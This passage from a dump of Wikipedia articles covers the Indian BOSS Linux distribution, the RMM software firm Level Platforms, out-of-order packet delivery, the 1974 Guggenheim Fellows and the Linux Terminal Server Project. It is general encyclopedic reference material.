prior knowledge of all the files being packaged. References External links B1 Pack Project Archive formats Open formats
20015881
https://en.wikipedia.org/wiki/Bharat%20Operating%20System%20Solutions
Bharat Operating System Solutions
Bharat Operating System Solutions (BOSS GNU/Linux) is an Indian Linux distribution derived from Debian. BOSS Linux is officially released in four editions: BOSS Desktop (for personal use, home and office), EduBOSS (for schools and education community), BOSS Advanced Server and BOSS MOOL. The latest stable version 8.0 ("Unnati"), was released on 11 July 2019. Development It is developed by Centre for Development of Advanced Computing (C-DAC) in order for enhancing and gain benefit from the usage of Free and Open Source Software throughout India. BOSS Linux is a key deliverable of National Resource Centre for Free and Open Source Software (NRC-FOSS). It has enhanced desktop environment integrated with Indian language support and other software. The software has been endorsed by the Government of India for adoption and implementation on a national scale. BOSS Linux is an "LSB certified" Linux distribution. The software has been certified by the Linux Foundation for compliance with the Linux Standard Base (LSB) standard. It supports Intel and AMD IA-32/x86-64 architecture till version 6. From version 7, the development shifted to x86-64 architecture only. Uses As of 2019, very few institutions and individuals in India use BOSS. BOSS and LibreOffice is included in the school syllabus but only few schools teach these open source software to the students. Version history BOSS Linux has had seven major releases. BOSS 5.0 (Anokha) This release came with many new applications mainly focused on enhanced security and user friendliness. The distribution includes over 12,800 new packages, for a total of over packages. Most of the software in the distribution has been updated: over software packages (this is 70% of all packages in Savir). BOSS 5.0 supports Linux Standard Base (LSB) version 4.1. The new version features XBMC to allow the user to easily browse and view videos, photos, podcasts, and music from a hard drive, optical disc, local network, and the internet. BOSS 6.0 (Anoop) There are several major updates in BOSS Linux 6.0 (Anoop) from 5.0 (Anokha). Notable changes include a kernel update from 3.10 to 3.16, a shift for system boot from init to systemd, the full support of GNOME Shell as part of GNOME 3.14, an update to the GRUB version, Iceweasel being replaced by Firefox and Pidgin replacing Empathy, and several repository versions of available programs being updated as part of the release. BOSS Linux 6.0 also shipped with various application and program updates, such as updates to LibreOffice, X.Org, Evolution, GIMP, VLC media player, GTK+, GCC, GNOME Keyring, and Python. Related specifically to the localisation support, language support got even better with the replacement of SCIM with IBus with the Integrated System Settings. Now Indic languages enabled with ″Region and Languages″ are directly mapped to the IBus and the OnScreenKeyboard layout is provided for all layouts. This release is fully compatible with LSB 4.1. BOSS 7.0 (Drishti) Biggest change over previous releases is that support for x86 version has been dropped and now it is only available for x86-64. Other noticeable changes include a linux kernel update to 4.9.0, GNOME update from 3.14 to 3.22 and software updates to various applications and programs with wide Indian language support & packages. This release aims more at enhancing the user interface with more glossy themes and is coupled with latest applications from the community. BOSS 8.0 (Unnati) Desktop Environment is changed from GNOME to Cinnamon. See also Debian Comparison of Linux distributions Free culture movement Simputer References External links 2007 software Debian-based distributions Language-specific Linux distributions Operating system distributions bootable from read-only media X86-64 Linux distributions Indic computing Urdu-language computing State-sponsored Linux distributions Linux distributions
12756727
https://en.wikipedia.org/wiki/Level%20Platforms
Level Platforms
Level Platforms was a provider of remote monitoring and management (RMM) software products and services for managed services providers (MSPs), IT service providers and valued added resellers (VARs) that provide IT support services for small and medium size businesses (SMBs) and branch offices. It was purchased by AVG Technologies in 2013 and was merged into the company. History Level Platforms (LPI Level Platforms) was formed in 1999 as an international MSP serving SMBs. The company subsequently shifted its strategy to create the next generation of RMM software, releasing its initial Managed Workplace platform in May 2004. On 12 June 2013, Level Platforms (LPI Level Platforms) was acquired by AVG Technologies. Level Platforms' founder Peter Sandiford left AVG in January 2014. Products IT services providers in 30 countries around the world use Managed Workplace to deliver managed services to their small and midsized business customers. The software platform delivers integrated monitoring, management and automation capabilities, allowing service providers to manage all of their customers complete IT environments including computers, applications, security, IP telephony, cloud services and more from a single web-based dashboard. The software is provided in cloud and on-premises editions. With Managed Workplace 2011, the company introduced features that allow MSPs to manage printers and imaging assets. With the release of Managed Workplace 2012, Level Platforms introduced Mobile Device Management (MDM) capabilities that allow MSPs to monitor, configure and secure smartphones and tablets that run on operating systems from Apple, Google, Microsoft and RIM. MDM features, such as the ability to collect detailed asset information, remotely configure devices, track location and restrict user access if required, allow MSPs to address critical security and administration concerns for end-clients as sensitive corporate material is shared and accessed on mobile devices. In July 2012, Level Platforms introduced enhanced mobile device security capabilities, including the ability to automatically reset passwords, lock devices or wipe all information when a device is lost,. In December 2012, the company announced that it was the first RMM vendor delivering MDM features for iPhone 5 and iOS 6. Level Platforms also introduced white label Network Operations Center (NOC) and Help Desk Services, fully integrated in the Managed Workplace RMM platform, to allow MSPs to deliver 24x7x365 remediation and support offerings. A number of corporations license Level Platforms OEM Cloud Edition software to provide a private labeled managed services platform to their channel partners including Hitachi Systems, Synnex and Intel. References Software companies of Canada Software companies established in 1999 Companies based in Ottawa 1999 establishments in Ontario
24121493
https://en.wikipedia.org/wiki/Out-of-order%20delivery
Out-of-order delivery
In computer networking, out-of-order delivery is the delivery of data packets in a different order from which they were sent. Out-of-order delivery can be caused by packets following multiple paths through a network, by lower-layer retransmission procedures (such as automatic repeat request), or via parallel processing paths within network equipment that are not designed to ensure that packet ordering is preserved. One of the functions of TCP is to prevent the out-of-order delivery of data, either by reassembling packets in order or requesting retransmission of out-of-order packets. See also Packet loss Selective ACK IP fragmentation Head-of-line blocking External links RFC 4737, Packet Reordering Metrics, A. Morton, L. Ciavattone, G. Ramachandran, S. Shalunov, J. Perser, November 2006 RFC 5236, Improved Packet Reordering Metrics, A. Jayasumana, N. Piratla, T. Banka, A. Bare, R. Whitner, June 2008 https://web.archive.org/web/20171022053352/http://kb.pert.geant.net/PERTKB/PacketReordering http://www-iepm.slac.stanford.edu/monitoring/reorder/ https://www.usenix.org/conference/nsdi12/minion-unordered-delivery-wire-compatible-tcp-and-tls Packets (information technology)
1568504
https://en.wikipedia.org/wiki/List%20of%20Guggenheim%20Fellowships%20awarded%20in%201974
List of Guggenheim Fellowships awarded in 1974
List of Guggenheim fellowship winners for 1974. United States and Canada fellows Hazard Adams, Byron W. and Alice L. Lockwoood Emeritus Professor of Humanities; Professor of English, University of Washington. Flavia Alaya, Professor of Literature and Cultural History, Ramapo College of New Jersey. Edward Alexander, Professor of English, University of Washington. Frederick J. Almgren Jr., deceased. Mathematics. J. L. Alperin, Professor of Mathematics, University of Chicago. Donald Appleyard, deceased. Urban Planning. Michael Asher, artist, Los Angeles. Jerold Stephen Auerbach, Professor of History, Wellesley College. John Norman Austin, Professor of Classics, University of Massachusetts Amherst. Andrew S. Bajer, Professor of Biology, University of Oregon. Paul Thornell Baker, Professor Emeritus of Anthropology, Pennsylvania State University. Korkut Bardakci, Professor of Physics, University of California, Berkeley. John Walton Barker, Jr, Emeritus Professor of History, University of Wisconsin–Madison. William Barrett, deceased. Philosophy. Robert Beauchamp, deceased. Fine Arts, Painting. Saul Benison, Professor of History;, Professor Emeritus of Environmental Health, College of Medicine, University of Cincinnati. John Calvin Berg, Rehnberg Professor of Chemical Engineering, University of Washington. Stephen Berg, poet; Professor of English, Philadelphia College of Art. Robert Allan Bernheim, Professor of Chemistry, Pennsylvania State University. Jacob Bigeleisen, Distinguished Professor Emeritus of Chemistry, Stony Brook University. George R. Bird, Professor of Chemistry, Rutgers University. Joseph Warren Bishop, Jr, deceased. Law. Nell Blaine, deceased. Fine Arts, Painting. Laura Bohannan, Professor of Anthropology, University of Illinois at Chicago Circle. Albert Boime, Professor of Art History, University of California, Los Angeles: 1974, 1984. Mark Boulby, Professor Emeritus of German, University of British Columbia. Barbara Cherry Bowen, Chair, Professor of French and Comparative Literature, Vanderbilt University, Nashville, TN. James B. Boyd, deceased. Biochemistry-Molecular Biology. Roberto G. Brambilla, Architect and Urban Designer, New York City. Roger Ware Brockett, An Wang Professor of Electrical Engineering and Computer Science, Harvard University. Frederick Phillips Brooks, Jr., Kenan Professor of Computer Science, University of North Carolina at Chapel Hill. Philip R. Brooks, Professor of Chemistry, Rice University. William Browder, Professor of Mathematics, Princeton University. George Bruening, Professor of Plant Pathology; Biochemist in Experiment Station, University of California, Davis. Jean Louis Bruneau, Professor of French and Comparative Literature, Harvard University. Gerald L. Bruns, William and Hazel White Professor, University of Notre Dame: 1974, 1985. Bob B. Buchanan, Professor of Molecular Plant Biology, University of California, Berkeley. Howard Buchwald, artist, New York City. Edwin Burmeister, Research Professor of Economics, Duke University. Walter Dean Burnham, Professor of Political Science, University of Texas at Austin. Richard L. Bushman, Morris Professor of History, Columbia University. Joseph A. Callaway, deceased. Senior Professor Emeritus of Old Testament, Southern Baptist Theological Seminary. Martin C. Carey, Professor of Medicine and Professor of Health Sciences and Technology, Harvard Medical School. Stephen McKinley Carr, architect, Arrowstreet, Inc., Cambridge, Massachusetts. Ronald A. Castellino, Chair, Department of Medical Imaging, Memorial Sloane-Kettering Cancer Center, New York City. Matthew Y. Chen, Professor of Linguistics, University of California, San Diego. Fredi Chiappelli, deceased. Italian Literature. Allen T. Y. Chwang, Sir Robert Ho Tung Professor and Department Head of Mechanical Engineering, University of Hong Kong . William A. Clemens, Professor of Paleontology, University of California, Berkeley. William Brooks Clift, III, photographer, Santa Fe, New Mexico: 1974, 1980. Clarence Lee Cline, Ashbel H. Smith Professor Emeritus of English, University of Texas at Austin. George Cohen, Professor Emeritus of Art, Northwestern University Frank Van Deren Coke, Continuing Visiting Professor, School of Art, Arizona State University, Tempe, Arizona. Allan Meakin Collins, Research Professor of Education, Boston College and Professor of Education & Social Policy, Northwestern University. Alfred Fletcher Conard, Henry M Butzel Professor Emeritus of Law, University of Michigan. Carl Allin Cornell, Professor of Civil Engineering. James Welton Cornman, deceased. Philosophy. Thomas Joseph Cottle, Professor of Education, Boston University. Diana Crane, Professor of Sociology, University of Pennsylvania. Ernest R. Davidson, Distinguished Professor of Chemistry, Indiana University. Bertram H. Davis, Professor of English, Florida State University. Gene Davis, deceased. Fine Arts. Kenneth Sydney Davis, deceased. Biography. John M. Deutch, Institute Professor of Chemistry, Massachusetts Institute of Technology. Michael Di Biase, photographer. Penelope Billings Reed Doob, Professor of English and Multidisciplinary Studies, York University, Ontario, Canada. Jack Daniel Douglas, Professor of Sociology, University of California, San Diego. James Dow, photographer; Instructor in Photography, School of the Museum of Fine Arts, Boston. Brian Dutton, deceased. Spanish and Portuguese Literature. Clifford John Earle, Jr., Professor of Mathematics, Cornell University. Harry Eckstein, deceased. UCI Distinguished Professor and Professor of Political Science, University of California, Irvine. Scott McNeil Eddie, Professor of Economics, University of Toronto. Robert S. Edgar, Professor Emeritus of Biology, University of California, Santa Cruz. Russell Edson, writer, Darien, Connecticut. William J. Eggleston, photographer, Memphis. Eldon J. Epp, Harkness Professor Emeritus of Biblical Literature and Dean Emeritus of Humanities and Social Sciences, Case Western Reserve University. Solomon David Erulkar, deceased. Neuroscience. Susan M. Ervin-Tripp, Professor of Rhetoric, University of California, Berkeley. Stephanie Evanitsky, choreographer, New York City. Thomas E. Everhart, President Emeritus, California Institute of Technology. Gerald David Fasman, Louis I. and Bessie Rosenfield Professor of Biochemistry, Brandeis University: 1974, 1988. Joel Feinberg, Regents Professor of Philosophy and Law, University of Arizona. Gerald R. Fink, American Cancer Society Professor of Genetics, Whitehead Institute for Biomedical Research, Massachusetts Institute of Technology. Frank W. Fitch, Albert D. Lasker Professor Emeritus in the Medical Sciences; Director, The Ben May Institute, University of Chicago. George William Flynn, Eugene Higgins Professor of Chemistry, Columbia University. Paul Foster, playwright; President, La Mama Theatre, New York City. Primous Fountain, composer, Chicago: 1974, 1977. Phyllis Joan Freeman, senior editor, translator, and scholar, Great Neck, New York. Donald M. Friedman, Professor of English, University of California, Berkeley. Frank Gagliano, playwright; Benedum Professor of Playwriting, University of West Virginia. Richard Newton Gardner, Professor of Law and International Organization, Columbia University. George Palmer Garrett, writer; Henry Hoyns Professor of English, University of Virginia at Charlottesville. Theodore Henry Geballe, Theodore and Sydney Rosenberg Professor Emeritus of Applied Physics, Stanford University. Irma Gigli, The Walter and Mary Mischer Professor in Molecular Medicine, University of Texas Health Science Center, Houston. Charles Ginnever, artist, New York City. Seymour Ginsburg, Fletcher Jones Professor of Computer Science, University of Southern California. Ira Gitler, Jazz Faculty, Manhattan School of Music Dohn George Glitz, Emeritus Professor of Biological Chemistry, University of California, Los Angeles. Bernard R. Goldstein, Associate Professor, Jewish Studies Program and Department of History and Philosophy of Science, University of Pittsburgh. Melvin J. Goldstein, Senior Investigator, Bromine Compounds, Ltd., Beer Sheva, Israel. Robert E. Goldstein, Director, Division of Cardiology; Professor of Medicine and Physiology, Uniformed Services University of the Health Sciences, Bethesda, Maryland. Emmet Gowin, photographer; Professor of Photography, Princeton University. Martin Burgess Green, Emeritus Professor of English, Tufts University: 1974, 1977. Stephen J. Greenblatt, Harry Levin Professor of Literature, Harvard University: 1974, 1982. Leonard Gross, Professor of Mathematics, Cornell University. Howard E. Gruber, Professor of Psychology, Teachers College, Columbia University. Werner L. Gundersheimer, director, Folger Shakespeare Library, Washington, D.C.. Jean Howard Hagstrum, deceased. 18th Century English Literature. David Nicholas Hancock, deceased. Film. Joel F. Handler, Professor of Law, University of California, Los Angeles. Louis Rudolph Harlan, Distinguished Professor of History, University of Maryland, College Park. Robert Haselkorn, Fanny L. Pritzker Distinguished Service Professor of Biophysics and Theoretical Biology, University of Chicago. Shirley Hazzard, writer, New York City. Eliot S. Hearst, Adjunct Professor of Psychology, University of Arizona. Barbara Hinckley, deceased. Political Science. Peter Crafts Hodgson, Charles G. Finney Professor of Theology, Vanderbilt University. Jill Hoffman, poet, New York City. William M. Hoffman, playwright, New York City. Harry P. C. Hogenkamp, Professor of Biochemistry, University of Minnesota. Paul Hollander, Professor of Sociology, University of Massachusetts Amherst. Ralph Leslie Holloway, Jr., Professor of Anthropology, Columbia University. Raymond Frederick Hopkins, Richter Professor of Political Science, Swarthmore College. William DeWitt Horrocks, Jr., Professor of Chemistry, Pennsylvania State University. Richard G. Hovannisian, Professor of History, University of California, Los Angeles. Sandria Hu, Artist; Professor of Art, University of Houston at Clear Lake City. Francis Gilman Hutchins, director, Amarta Press, West Franklin, New Hampshire. John Woodside Hutchinson, Gordon McKay Professor of Applied Mechanics, Harvard University. Akira Iriye, Professor of American Diplomatic History, University of Chicago. James Francis Ivory, filmmaker, New York City. John M. Jacobus, Professor of Art, Dartmouth College. Charles Wilson Brega James, deceased. Fine Arts Research. Martin E. Jay, Professor of History, University of California, Berkeley. Robert Eugene Jensen, Professor of Accounting, Trinity University. Robert Earl Johannes, marine ecologist, Tasmania, Australia. Gerald Jonas, Writer, New York City. Sanford H. Kadish, Morrison Professor Emeritus of Law, University of California, Berkeley. Sidney Henry Kahana, Senior Scientist, Brookhaven National Laboratory. Michael Kassler, Managing Director, Michael Kassler and Associates, McMahons Point, Australia. Israel Joseph Katz, Research Associate, Teaneck, NJ. Jane A. Kaufman, artist, New York City. Donald R. Kelley, James Westfall Thompson Professor of History, Rutgers University: 1974, 1981. George Armstrong Kelly, deceased. Political Science. Norman Kelvin, Professor of English, City College, City University of New York: 1974. Tracy S. Kendler, deceased. Emeritus Professor of Psychology, University of California, Santa Barbara. Frank J. Kerr, Professor Emeritus of Astronomy, University of Maryland. André Kertész, deceased. Photography. Robion Cromwell Kirby, Professor of Mathematics, University of California, Berkeley. Lewis J. Kleinsmith, Arthur F. Thurnau Professor of Biology, University of Michigan. Bettina L. Knapp, Professor of Romance Languages and Comparative Literature, Hunter College and Graduate Center, City University of New York. Etheridge Knight, deceased. Poetry. Alan J. Kohn, Professor of Zoology, University of Washington. Philip A. Kuhn, Francis Lee Higginson Professor of History and of East Asian Languages and Civilizations, Harvard University. Meyer Kupferman, composer; Emeritus Professor of Composition and Chamber Music, Sarah Lawrence College. Phyllis Lamhut, choreographer; Artistic Director, Phyllis Lamhut Dance Company, Inc.; Instructor, Tisch School of the Arts, New York University. Elinor Langer, writer; Portland, Oregon. James S. Langer, Professor of Physics, University of California, Santa Barbara. Christopher Lasch, deceased. U.S. History. Bibb Latané, Professor of Psychology, University of North Carolina at Chapel Hill. James Ronald Lawler, Edward Carson Waller Professor of French, University of Chicago. John Scott Leigh, Jr., Professor of Biochemistry/Biophysics, Director, Metabolic Magnetic Resonance Research Center, University of Pennsylvania. J. A. Leo Lemay, H. F. du pont Winterthur Professor of English, University of Delaware. James T. Lemon, Emeritus Professor of Geography, University of Toronto. Fred Lerdahl, composer; Fritz Reiner Professor of Music Composition, Columbia University. Barry Edward Le Va, artist, New York City. David Ford Lindsley, Associate Professor of Physiology, University of Southern California School of Medicine. Stuart Michael Linn, Head, Professor of Biochemistry, University of California, Berkeley. Edgar Lipworth, deceased. Particle Physics. Robert Shing-Hei Liu, Professor of Chemistry, University of Hawaii at Manoa. Leon Livingstone, Professor Emeritus of Spanish, State University of New York at Buffalo. Claudia A. Lopez, writer; editor emeritus, The Papers of Benjamin Franklin, Yale University. Susan Lowey, Professor of Biochemistry, Brandeis University. Joaquin Mazdak Luttinger, deceased. Physics. James Karl Lyon, Scheuber-Veinz Professor of German, Brigham Young University. Frank MacShane, writer; Professor of Writing School of the Arts, Columbia University. Leon Madansky, Decker Professor of Physics, Johns Hopkins University. William Majors, deceased. Fine Arts-Graphics. Edward E. Malefakis, Professor of History, Columbia University. John Frederick Manley, Associate Professor of Political Science, Stanford University. Nicholas Marsicano, deceased. Fine Arts-Drawing. Donald B. Martin, Emeritus Professor of Medicine, University of Pennsylvania. Jack Matthews, writer; Distinguished Professor of English, Ohio University. John Patrick McCall, Consultant, Xavier University, New Orleans, Louisiana; President Emeritus and Professor Emeritus of English, Knox College. Frank D. McConnell, deceased. 19th Century English Literature. Tom McHale, deceased. Fiction. John Paul McTague, associate director, Office of Science and Technology Policy, Washington DC. Mark Medoff, playwright; Professor Emeritus of Theatre Arts & English, New Mexico State University. Joan P. Mencher, Professor of Anthropology, The Graduate Center, City University of New York. Roger Mertin, photographer; Professor of Fine Arts, University of Rochester. Christopher Middleton, writer; David J. Bruton Centennial Professor Emeritus of Germanic Languages, University of Texas at Austin. Barbara Stoler Miller, deceased. East Asian Studies. Clement A. Miller, Professor Emeritus of Fine Arts, John Carroll University. Harold A. Mooney, Paul S. Achilles Professor of Environmental Biology, Stanford University. George H. Morrison, Professor of Chemistry, Cornell University. Raymond Dale Mountain, NIST Fellow. Michael Murrin, Professor of English and of the Humanities, and Professor of Religion and Literature, University of Chicago. Thea Musgrave, composer, New York City; Distinguished Professor of Music, Queens College, CUNY, Flushing NY: 1974, 1982. Pandit Pran Nath, deceased. Music Composition. Victor Saul Navasky, writer; publisher, editorial director, The Nation, New York City. Alan H. Nelson, Professor of English, University of California, Berkeley. Gerry Neugebauer, Professor of Physics, California Institute of Technology. Charles Newman, writer; Professor of English, Washington University. Brian E. Newton, Professor Emeritus of Linguistics, Simon Fraser University Ernest Pascal Noble, Pike Professor of Alcohol Studies, University of California, Los Angeles. Richard Nonas, artist, New York City. Barbara Novak, Professor of Art History, Barnard College, Columbia University. Wallace Eugene Oates, Professor of Economics, University of Maryland, College Park. Ken T. Ohara, photographer, Glendale, California. Tetsu Okuhara, pPhotographer, New York City. Bernard Jay Paris, Emeritus Professor of English, University of Florida. Hershel Parker, H. Fletcher Brown Professor of American Romanticism, University of Delaware. Robert Ladislav Parker, Associate Professor of Geophysics, University of California, San Diego. Philip Pechukas, Professor of Chemistry, Columbia University. Joel Perlman, artist; Instructor in Fine Arts, School of Visual Arts, New York City. Robert P. Perry, senior member, Institute for Cancer Research; Professor of Biophysics, University of Pennsylvania. Barbara G. Pickard, Professor of Biology, Washington University. Robert Pirsig, writer, Portsmouth, New Hampshire. Richard Poirier, Marius Bewley Professor of English, Rutgers University. Edward C. Prescott, Professor of Economics, University of Minnesota. Douglas Radcliff-Umstead, deceased. Italian Literature. J. Austin Ranney, Professor of Political Science, University of California at Berkeley. Klaus Raschke, Professor, Plant Physiology Institute, University of Göttingen. Edward Reich, Distinguished Professor of Pharmacology, SUNY at Stony Brook. Erica Reiner, John A. Wilson Distinguished Service Professor Emeritus of Assyriology, University of Chicago. Richard Rhodes, writer, Cambridge, Massachusetts. Frank M. Richter, Chair, Professor of Geophysics, University of Chicago. Robert E. Ricklefs, Curators' Professor of Biology, University of Missouri-St. Louis. Brunilde S. Ridgway, Rhys Carpenter Professor Emeritus of Classical and Near Eastern Archaeology, Bryn Mawr College. Richard Robbins, Professor Emeritus of Sociology, University of Massachusetts Boston. Fred Colson Robinson, Douglas Tracy Smith Professor of English, Yale University. James William Robinson, Emeritus Professor of Chemistry, Louisiana State University (Baton Rouge). Paul Sheldon Ronder, deceased. Film. David Rosand, Meyer Schapiro Professor of Art History, Columbia University. Fred S. Rosen, President, Center for Blood Research and James L. Gamble Professor of Pediatrics, Harvard Medical School. Milton J. Rosenberg, Professor of Psychology, University of Chicago. Lillian Ross, writer; staff Writer, The New Yorker Magazine. John Roger Roth, Distinguished Professor of Biology, University of Utah. Albert Rothenberg, Clinical Professor of Psychiatry, Yale University. Jerome Rothenberg, poet; Emeritus Professor of English, University of California-San Diego. Lawrence Ryan, Professor of German, University of Massachusetts Amherst. Ryuzo Sato, C.V. Starr Professor of Economics, New York University. R. Murray Schafer, composer, Occidental, California. Paul Namon Schatz, Emeritus Professor of Chemistry, University of Virginia. Leo F. Schnore, deceased. Sociology. David Schoenbaum, Professor of History, The University of Iowa. John Luther Schofill, Jr., filmmaker, Seaside, California. Martin E. Seligman, Bob and Arlene Kogod Term Chair, University of Pennsylvania. Edwin Bennett Shostak, artist, New York City. Marcia B. Siegel, Emeritus Professor of Performance Studies, New York University. David Oliver Siegmund, Professor of Statistics, Stanford University. Paul B. Sigler, Professor and Investigator, Howard Hughes Medical Institute, Yale University. Thomas Elliott Skidmore, Carlos Manuel de Céspedes Professor of Modern Latin American History, Brown University. Lawrence Sklar, William K. Frankena Collegiate Professor and Professor of Philosophy, University of Michigan. Douglas Milton Sloan, Associate Professor of History and Education, Teachers College, Columbia University. Patricia H. Sloane, Professor of Art, New York City Community College, City University of New York. Steven Sloman, artist; Instructor in Painting and Associate Dean, New York Studio School. Henry Nash Smith, deceased. American Literature. Walter L. Smith, Statistics. Roman Smoluchowski, deceased. Physics. Robert Somerville, Professor of Religion and History, Columbia University: 1974, 1987. Frederick Sommer, deceased. Photography. James Keith Sonnier, artist, New York City. Pseudonym: Sonnier, Keith. Edward A. Spiegel, Professor of Astronomy, Columbia University. Hans-Peter Stahl, Andrew W. Mellon Professor of Classics, University of Pittsburgh. Robert Culp Stalnaker, Professor of Philosophy, M.I.T., Cambridge, MA. Howard Stein, Professor of Philosophy, University of Chicago. Ralph Steiner, deceased. Film. Alfred C. Stepan, Burgess Professor of Political Science, Columbia University. Shlomo Sternberg, Professor of Mathematics, Harvard University. David F. Stock, Composer; Professor of Music, Duquesne University, Pittsburgh. Alfred Stracher, Chairman, Distinguished Professor of Biochemistry, State University of New York Downstate Medical Center at Brooklyn. Mark Strand, poet; Andrew MacLeish Distinguished Service Professor, University of Chicago. William B. Streett, Joseph Silbert Dean of Engineering, Emeritus, Cornell University. Jack L. Strominger, Higgins Professor of Biochemistry, Harvard University. Robert Dale Sweeney, Classics, Fayetteville, Tennessee. Julian Szekely, deceased. Engineering. William Tarr, sculptor, Sarasota, Florida. Alexander Theroux, writer, West Barnstable, Massachusetts. Charles Tilly, Professor of Sociology, Columbia University. Humphrey Tonkin, President Emeritus; University Professor of the Humanities, University of Hartford. Preston A. Trombly, composer, New York City. Alwyn Scott Turner, photographer, Manzanita, Oregon. Robert Y. Turner, Professor of English, University of Pennsylvania. James A. Turrell, artist, Flagstaff, Arizona. Paolo Valesio, Director of Graduate Studies; Professor of Italian Linguistics, Yale University. John Britton Vickery, Vice Chancellor, University of California, Riverside. David Von Schlegell, Deceased. Fine Arts, Sculpture. Alexander Vucinich, Professor Emeritus of History and Sociology of Science, University of Pennsylvania: 1974, 1985. R. Stephen Warner, Professor of Sociology, University of Illinois at Chicago. Watt Wetmore Webb, S. B. Eckert Professor in Engineering and Professor of Applied Physics, Cornell University. Michael A. Weinstein, Professor of Political Science, Purdue University. William Ira Weisberger, Professor of Physics, State University of New York at Stony Brook. Ulrich W. Weisstein, Professor Emeritus of Comparative Literature and of Germanic Studies, Indiana University. Raymond O'Neil Wells, Jr., Professor of Mathematics, Rice University. Frank Simon Werblin, Associate Professor of Electrical Engineering and Computer Sciences, University of California, Berkeley. Winthrop Wetherbee, Avalon Foundation Professor in the Humanities, Cornell University. Donald F. Wheelock, composer; Associate Professor of Music, Smith College: 1974, 1984. Reed Whittemore, Professor of English, University of Maryland, College Park. Appointed as Whittemore, Edward Reed. C. K. Williams, poet, Greensboro, North Carolina. Gernot Ludwig Windfuhr, Professor of Iranian Studies, University of Michigan. Marian Hannah Winter, Deceased. Theatre Arts. Eugene Victor Wolfenstein, Professor of Political Science, University of California, Los Angeles. Don Worth, photographer; Professor of Art, San Francisco State University. Jay Wright, poet, Bradford, Vermont. Sanford Wurmfeld, artist; Chair, Professor of Art, Hunter College, City University of New York. Bertram Wyatt-Brown, Richard J. Milbauer Professor of History, University of Florida. Gabrielle Yablonsky, Research Associate, Center for South and Southeast Asian Studies, University of California, Berkeley. Susan Yankowitz, playwright, New York City. Robert Yaris, Professor of Chemistry, Washington University. Al Young, writer, Palo Alto, California. John A. Yount, writer; Emeritus Professor of English, University of New Hampshire. Harris P. Zeigler, Distinguished University Professor of Psychology, Hunter College, City University of New York. Paul F. Zweifel, University Distinguished Professor Emeritus, Virginia Polytechnic Institute and State University. Latin American and Caribbean Fellows René Acuña-Sandoval, research ethnohistorian, Institute of Philological Research, National Autonomous University of Mexico: 1974, 1983. Lea Baider, Associate Professor, Medical Psychology, Director, Psycho-Oncology Unit, Sharett Institute of Oncology, Jerusalem. José Francisco S. Bianco, deceased. Fiction. Alfredo Bryce Echenique, writer, Spain. Augusto Ricardo Cardich, Professor Emeritus of American Archaeology, National University of La Plata. Marcelino Cereijido, Professor of Physiology, Center for Research and Advanced Studies, National Polytechnic Institute, Mexico City. Miguel Condé, artist (painting, drawing and etching), Madrid and Barcelona, Spain. Héctor Luis D'Antoni, Senior Research Scientist, NASA Ames Research Center, Moffett Field, California. Humberto Díaz Casanueva, deceased. General Nonfiction. Manuel Felguérez, artist; Instructor in the Visual Arts, National School of Plastic Arts, National Autonomous University of Mexico. Juan H. Fernández, Professor of Biology, University of Chile. Erasmo Madureira Ferreira, Professor of Physics, Federal University of Rio de Janeiro. Risieri Frondizi (1910-1983), Philosophy. Juan José Gurrola Iturriaga, playwright; advisor for cultural affairs, National Autonomous University of Mexico. Celia Jakubowicz de Matzkin, Research Associate, Laboratory of Experimental Psychology, University of Paris V. Pablo Macera, Professor of Social Sciences, National University of San Marcos. Clodomiro Marticorena, Professor of Botany, University of Concepción. Luiz C. M. Miranda, Technical Director, Institute of Advanced Studies, Aerospace Technological Institute Sao José dos Campos, Brazil. Norma Bahia Pontes, filmmaker, Río de Janeiro. aka Bahia, Norma. Alberto Carlos Riccardi, Professor of Paleotology, National University of La Plata; Head Division of Invertebrate Paleozoology, Museum of La Plata. Neantro Saavedra Rivano, Professor of Mathematics, Simón Bolívar University. Juan Alberto Schnack, Career Investigator, National Council of Argentina; Instructor, Institute of Limnology, University of La Plata. Javier Sologuren Moreno, writer, Lima, Peru. Mario Suwalsky Weinzimmer, Professor of Chemistry, University of Concepción. Mario Toral, artist, New York City. Roberto Torretti, Professor of Philosophy, University of Puerto Rico, Río Piedras: 1974, 1980. Claudio Véliz, Director, University Professors Program, Boston University. Mario Vergara Martínez, Professor of Geology, University of Chile See also Guggenheim Fellowship External links Guggenheim Fellows for 1974 1974 1974 awards
954473
https://en.wikipedia.org/wiki/Linux%20Terminal%20Server%20Project
Linux Terminal Server Project
Linux Terminal Server Project (LTSP) is a free and open source terminal server for Linux that allows many people to simultaneously use the same computer. Applications run on the server with a terminal known as a thin client (also known as an X terminal) handling input and output. Generally, terminals are low-powered, lack a hard disk and are quieter and more reliable than desktop computers because they do not have any moving parts. This technology is becoming popular in schools as it allows the school to provide pupils access to computers without purchasing or upgrading expensive desktop machines. Improving access to computers becomes less costly as thin client machines can be older computers that are no longer suitable for running a full desktop OS. Even a relatively slow CPU with as little as 128 MB of RAM can deliver excellent performance as a thin client. In addition, the use of centralized computing resources means that more performance can be gained for less money through upgrades to a single server rather than across a fleet of computers. By converting existing computers into thin clients, an educational institution can also gain more control over how their students are using computing resources as all of the user sessions can be monitored on the server. See Epoptes (A Lab Management Tool). The founder and project leader of LTSP is Jim McQuillan, and LTSP is distributed under the terms of the GNU General Public License. The LTSP client boot process On the LTSP server, a chroot environment is set up with a minimal Linux operating system and X environment. Either: the computer will boot from a local boot device (like a harddisk, CD-ROM or USB disk), where it loads a small Linux kernel from that device which initializes the system and all of the peripherals that it recognizes, or the thin client will use PXE or Network booting, a part of the onboard Ethernet firmware, to request an IP address and boot server (the LTSP server) using the DHCP protocol. A PXE bootloader (PXElinux) is loaded which then retrieves a Linux kernel and initrd from a Trivial File Transfer Protocol (TFTP) service usually running on the LTSP server. Using the utilities in the initrd, the kernel will request a (new) DHCP IP address and the address of a server from which it can mount its root filesystem (the chroot mentioned above). When this information is retrieved, the client mounts the path on its root filesystem via either the Network File System (NFS) or Network Block Device (NBD) services running on the LTSP server. The client then loads Linux from the NFS mounted root filesystem (or NBD filesystem image) and starts the X Window system. At this XDMCP login manager on the LTSP server. In case of the newer MueKow (LTSP v5.x) setup, the client first builds an SSH tunnel to the LTSP server's X environment, through which it will start the LDM (LTSP Display Manager) login manager locally. From this point forward, all programs are started on the LTSP server, but displayed and operated from the client. Scalability Initially, the MILLE-Xterm project, funded by Canadian public agencies and school districts in the province of Quebec, created a version of LTSP integrating four subprojects: a portal (based on uportal), an open-source middleware stack, a CD with free software for Windows/Mac and, finally, MILLE-Xterm itself. The MILLE-Xterm project's goal was to provide a scalable infrastructure for massive X-Terminal deployment. MILLE means Modèle 